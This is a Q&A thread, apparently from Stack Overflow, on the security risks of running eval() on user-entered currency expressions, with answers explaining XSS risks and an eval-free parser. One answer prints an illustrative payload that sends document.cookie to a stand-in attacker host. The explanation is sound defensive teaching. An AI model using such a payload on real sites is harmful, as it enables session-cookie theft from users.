Closed 7 years ago.
Possible Duplicate:
When is JavaScript’s eval() not evil?
I am writing a script in which users have to write in a currency amount, some examples could be (user input >> converts to), with USD as default currency:
50 >> 50.0 USD
50.5 >> 50.5 USD
50+1 USD >> 51.0 USD
50 GBP >> 50.0 GBP
I want to make this as smooth as possible, therefore I want to use JavaScript (it's a web app based on PHP/MySql + JavaScript). I want to use regex to filter the input, run it through eval() and return it.
Is this a bad idea? I've read some topics about eval() being a security issue. I just don't see how. A user can easily run JavaScript anyway?
Keep in mind that I will validate all input server-side with PHP at a later stage.
You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hijacking your feature that uses eval for his own ends.
The reason eval is generally considered dangerous is because it is very easy for untrusted code to sneak in. Consider a page that allows you to specify input via query string, where the input box is prepopulated with the value in the query string.
An attacker could spread a link that contains code which steals a user's login cookie:
/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;
(Obviously proper URL encoding is required; this is for illustration.)
Or, perhaps your PHP script echoes posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.
Each of these attacks can be mitigated by using httpOnly cookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).
Even the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!
So the bottom line is that if you can make absolutely sure that the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, eval-ing it may expose you to a vulnerability.
See also:
- JavaScript to evaluate simple math string like 5*1.2 (eval/white-list?)
- JavaScript written only with brackets?
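One way to get the question's conversions without eval() at all, added here as an example (it is not code from the question or from either answer): a whitelist tokenizer plus a small recursive-descent evaluator, so a query-string payload like the one shown above is rejected while tokenizing instead of being executed. The function names, the grammar (numbers, + - * /, parentheses, an optional three-letter currency code) and the USD default are my own assumptions.

```javascript
// Added example, not from the question or either answer: evaluate the
// question's currency expressions ("50+1 USD" -> "51.0 USD") with a
// whitelist tokenizer and a small recursive-descent parser instead of eval().
const DEFAULT_CURRENCY = 'USD';

function tokenize(src) {
  // Sticky regex: every character must be part of a number, an operator, a
  // parenthesis or a 3-letter currency code; any script text is rejected here.
  const re = /\s*(\d+(?:\.\d+)?|[-+*/()]|[A-Z]{3})/y;
  const tokens = [];
  src = src.trim();
  while (re.lastIndex < src.length) {
    const at = re.lastIndex, m = re.exec(src);
    if (!m) throw new Error('invalid character at position ' + at);
    tokens.push(m[1]);
  }
  return tokens;
}

// Returns { amount, currency, text }; text is rendered as in the question ("50.0 USD").
function parseAmount(input) {
  const tokens = tokenize(input);
  let pos = 0;
  const ops = { '+': (a, b) => a + b, '-': (a, b) => a - b, '*': (a, b) => a * b, '/': (a, b) => a / b };
  const level = (next, allowed) => {           // left-associative binary operators
    let v = next();
    while (pos < tokens.length && allowed.includes(tokens[pos])) v = ops[tokens[pos++]](v, next());
    return v;
  };
  function factor() {                          // number | '(' expr ')' | '-' factor
    const t = tokens[pos++];
    if (t === undefined) throw new Error('unexpected end of input');
    if (/^\d/.test(t)) return Number(t);
    if (t === '-') return -factor();
    if (t === '(') {
      const v = expr();
      if (tokens[pos++] !== ')') throw new Error('missing )');
      return v;
    }
    throw new Error('unexpected token ' + t);
  }
  const term = () => level(factor, ['*', '/']);
  const expr = () => level(term, ['+', '-']);
  const amount = expr();
  const currency = /^[A-Z]{3}$/.test(tokens[pos] || '') ? tokens[pos++] : DEFAULT_CURRENCY;
  if (pos !== tokens.length) throw new Error('trailing input after the currency code');
  if (!Number.isFinite(amount)) throw new Error('amount is not a finite number');
  const cents = Math.round(amount * 100) / 100;   // at least one decimal, at most two
  return { amount, currency, text: (Number.isInteger(cents) ? cents.toFixed(1) : String(cents)) + ' ' + currency };
}
```

Because the tokenizer only accepts the grammar, the parsed result can be handed to the server-side PHP validation the question mentions without any JavaScript ever being evaluated on the client.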
If you need it, use it.
Here's a good link, which discusses both security ... as well as other common objections to "eval()":
- http://javascriptweblog.wordpress.com/2010/04/19/how-evil-is-eval/
What about security? If it's your software that's supplying eval with its argument then there's very little to fear on this front. Sure, it would be unwise to eval the value of an input box, but running eval over a response generated by your own server code should present no special risk. Also bear in mind there is no damage a would-be-attacker could do with client side eval that they couldn't more easily achieve with a modern browser console.
IMHO ...